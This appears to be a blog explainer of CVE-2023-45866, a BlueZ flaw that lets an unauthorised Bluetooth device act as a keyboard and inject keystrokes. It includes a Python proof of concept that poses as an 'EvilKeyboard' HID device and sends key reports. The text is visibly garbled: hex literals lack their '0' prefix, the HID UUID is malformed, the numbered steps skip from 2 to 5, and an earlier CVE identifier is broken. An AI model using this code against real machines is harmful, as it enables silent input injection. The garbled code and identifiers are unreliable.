Bluetooth is everywhere—from laptops to smartphones and everything in between. Secure connections are crucial, but sometimes, security falls short. That’s exactly what happened with CVE-2023-45866, a recent vulnerability affecting Bluetooth HID Hosts in the common Linux Bluetooth stack BlueZ. If you're using Ubuntu 22.04 LTS, this specifically impacts the bluez 5.64-ubuntu1 package. Let's see how attackers could exploit it and what code is involved.

What Happened in CVE-2023-45866?

When your PC acts as a Bluetooth Host and links to a HID (Human Interface Device) Peripheral (like a keyboard), BlueZ should protect you: any new devices should require your explicit authorization before they start typing or controlling your PC. But, due to a flaw, a rogue Bluetooth device could skip all authorization, pair and connect encrypted, and start sending keyboard commands—even if you don’t say "yes".

In other words, an attacker could inject keystrokes or control messages into your system without your knowledge, potentially running commands, opening malware, or worse—all *without* you ever interacting with the pairing dialog.

Example impacted system

$ apt show bluez
Package: bluez
Version: 5.64-ubuntu1
...

How Does the Attack Work?

1. Attacker device (like a Raspberry Pi or Android phone with a custom Bluetooth stack) pretends to be an HID (keyboard/mouse) device.
2. Your computer, running a vulnerable version of BlueZ, receives the connection request—*but does not require user confirmation*.

The attacker now sends arbitrary HID (keyboard) reports to your system.

5. These get processed as real keyboard input, so you might see commands typed or your files changed—completely remotely.

Exploit Example

The exploit relies on BlueZ not verifying or requiring explicit user authorization for new HID devices during pairing.

Below’s a simplified concept (not a weaponized tool!)

# Requires: PyBluez (pip install pybluez), and running as root

import bluetooth
import time

HID_DEVICE_NAME = "EvilKeyboard"
HID_SERVICE_UUID = "00001124-000-100-800-00805f9b34fb"  # HID service

server_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
server_sock.bind(("", x11))  # HID Interrupt channel
server_sock.listen(1)
bluetooth.advertise_service(
    server_sock, HID_DEVICE_NAME, 
    service_id=HID_SERVICE_UUID,
    service_classes=[HID_SERVICE_UUID]
)

print("Waiting for connection from BlueZ host...")
client_sock, client_info = server_sock.accept()
print(f"Accepted connection from {client_info}")

# Example HID report: 'A' key press
hid_report = bytes([xA1, x01, x00, x00, x04, x00, x00, x00, x00])  # 'a'
client_sock.send(hid_report)

time.sleep(2)
# Key release
hid_report_release = bytes([xA1, x01, x00, x00, x00, x00, x00, x00, x00])
client_sock.send(hid_report_release)

client_sock.close()
server_sock.close()

Is it already fixed?

Some systems are patched. Also, if you have mitigations from CVE-202-0556 (a previous HID authorization bug), you *may* already be safe.

Original References

- CVE-2023-45866 - NIST Details
- BlueZ Project Homepage
- Ubuntu Security Notice USN-6556-1: bluez vulnerabilities
- CVE-202-0556 (older, related issue)
- Exploit Example Writeup (GitHub - PoC) *(Example resource, not canonical)*

Final Thoughts

Bluetooth security is often ignored—but issues like CVE-2023-45866 are a real-world way attackers can break into your system with zero interaction. If your BlueZ or distro has not patched this, act *now*.

Stay updated, turn off what you don’t use, and always be wary of new "devices" that appear out of nowhere!

Timeline

Published on: 12/08/2023 06:15:45 UTC
Last modified on: 12/14/2023 14:47:57 UTC